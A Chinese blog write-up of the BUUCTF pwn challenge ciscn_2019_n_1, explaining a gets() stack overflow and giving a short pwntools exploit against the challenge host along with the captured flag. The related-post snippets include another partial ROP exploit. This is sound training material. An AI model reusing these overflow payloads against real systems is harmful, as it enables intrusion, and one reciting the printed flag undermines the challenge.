ctf pwn buuctf ciscn_2019_n_1

0rangecat

已于 2022-11-16 13:07:13 修改

阅读量245

点赞数 1

分类专栏： buuctf pwn 文章标签： python 安全架构 linux ubuntu 网络安全

于 2022-11-16 13:03:42 首次发布

本文链接：https://blog.csdn.net/orange_cat__/article/details/127883114

版权

buuctf pwn 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

一，查保护。

NX保护，堆栈不可执行。

64位程序

二，拖进IDA分析

调用了func（）函数，进去后分析。

如下图：

主要思路就是覆盖v2的地址为11.28125，利用gets函数输入v1时存在的栈溢出漏洞。

三，找payload所需条件。

v1距离v2为16×3-4=44.

11.28125的地址：

图上箭头指的为11.28125的16进制

点进去

找到地址。

四，打开靶机，写payload。

from pwn import *



p = remote("node4.buuoj.cn", 28877)
payload=b'a'*44+p64(0x41348000)

p.sendline(payload)

p.interactive()

五，打通获得flag。

flag{fb584c1a-982c-4dc9-8beb-84ec7610d6b7}

谢谢阅读。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0rangecat

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_

10-01

CTF常用小工具你值得拥有那个。。。。111

[每日一PWN]BUUCTF ciscn_2019_n_1

qq_55233040的博客

11-21

577

这道题双解，一种ret2text，另一种就是单纯的覆盖数据改变判断结果。

参与评论您还未登录，请先登录后发表或查看评论

ciscn_2019_n_1 ——两种解法

qq_41696518的博客

07-13

3058

ciscn_2019_n_1 两种解法

BUUCTF|PWN-[OGeek2019]babyrop1-WP

l2645470582_的博客

01-12

2318

1.检查保护机制（1）该文件是32位文件（2）开启堆栈不可执行 2.用32位IDA打开该文件

BUUCTF PWN [HarekazeCTF2019]baby_rop

Rt1Text的博客

05-27

341

1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数本题函数倒不是很多很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...

7.pwn入门新手练习NX 栈不可执行的绕过方式--ROP链

qiudalaojiao的博客

02-18

1065

文件地址提取码5o0a 我们先看看它开了那些保护看到了只开了nx 漏洞很明显可以看到 buf 这个字符串数组只有0x80的大小,但是却可以 read 0x200 个字节多出来的 0x200-0x80 就会造成溢出 32位程序默认调用函数的方式为先将参数压入栈中,靠近call指令的是第一个参数而64位程序默认调用函数的方式则不同 RDI 中存放第1个参数 RSI 中存放第2个参数 RD...

CTF-Solyd_2019

02-11

【CTF-Solyd_2019】是2019年举办的一场网络安全竞赛，CTF（Capture The Flag）通常是指网络安全领域的比赛，参赛者通过解决一系列信息安全问题来获取分数，这些问题涵盖多种领域，如逆向工程、密码学、网络攻防等。...

pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用

05-14

pwn_debug-基于pwntools的ctf pwns的辅助调试工具建议您在获得“用法和安装”的完整说明。这只是一个简单的描述。入门安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...

ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker

05-11

CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container，xxxx代表新的flag echo xxxx > /...

welpwn：:sparkling_heart:CTFpwn框架

02-04

介绍修剪是一门艺术。 welpwn旨在制作艺术品，使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address （带有PIE ） canary 支持多glibc调试。...

pwn学习总结

Ree的整理与收集

09-01

5847

遇到的优秀文章关于Heap Overflow（堆溢出） Linux常见漏洞利用技术实践 GCC 中的编译器堆栈保护技术 Linux环境进程间通信（一）现代Linux操作系统的栈溢出（一）解读Linux安全机制之栈溢出保护工具与常用命令*nix命令 export ...="..." 添加一个环境变量，这个环境变量只在这个shell进程中起作用 gdbgdb的话一定会装peda插件。p

pwn学习总结栈溢出，canary绕过和格式化字符串

MrTreebook的博客

11-07

779

pwn学习总结栈溢出，canary绕过和格式化字符串目录pwn学习总结栈溢出，canary绕过和格式化字符串1. checksec看一下保护2. IDA 看一下3. dgb动态调试3.1. gdb打开canary文件，断点先下在main函数上3.2. disass命令查看一下func函数的汇编代码3.3. 首先看一下canary的偏移是多少3.4. 在上面的func函数的汇编代码中可以看到canary的偏移量是多少3.5. 看一下canary的地址3.6. 看一下栈，计算一下溢出量4. exp 1.

ks8 本地化部署 F5-TTS

陈锐的技术笔记

11-13

983

此外，F5-TTS 还创新性地引入了推理时的 Sway Sampling 策略，这一策略可以在推理阶段优先处理早期的流步骤，从而提高生成语音与输入文本的对齐效果。在 LibriSpeech-PC 数据集上，该模型的字错误率（WER）达到了2.42，并且在推理时的实时因子(RTF)为0.15，显著优于之前的扩散模型 E2TTS，后者在处理速度和鲁棒性上存在短板。传统的 TTS 模型往往需要进行复杂的持续时间建模、音素对齐和专门的文本编码，这些都增加了合成过程的复杂性。继续TSS的启动，进入pod 输入命令。

外星人入侵

weixin_60243362的博客

11-12

2779

外星人入侵项目实践

什么是Python模块化编程

大数据实战派

11-13

486

模块化编程是一种编程方法论，它将程序的功能划分为多个独立的模块，每个模块负责程序中的一部分功能。通过这种方式，程序的代码被分割成更小、更易管理的部分，每个模块都可以独立开发、调试和测试，模块之间通过接口进行交互。模块化编程是将一个复杂的程序拆分为多个独立、功能明确的小模块的编程方法。这不仅提高了代码的复用性和可维护性，还促进了团队协作开发，增强了程序的扩展性。在实际开发中，模块化编程让代码结构更加清晰，逻辑更加简洁，为程序的长久维护和扩展打下了坚实的基础。

使用`nohup`后台运行Python服务不输出日志避坑

A15216110998的专栏

11-14

307

这里的应替换为你的Python脚本名称。错误日志未输出这里使用了2>&1来将错误输出重定向到与标准输出相同的文件。代码中的print()语句未输出到日志有时候，由于Python的缓冲输出机制，print()到屏幕的内容可能不会立即显示在日志中。要解决这个问题，可以使用-u现在，print()语句应该会立即出现在日志文件中。其他注意事项如果你的脚本依赖于环境变量，确保在启动脚本之前已经设置了这些变量，或者在脚本中显式导入它们。考虑使用第三方库如logging。

conda创建、查看、激活、删除 python 虚拟环境

DATABALL 的博客

11-14

293

conda创建、查看、激活、删除python虚拟环境

Conda环境与Ubuntu环境移植详解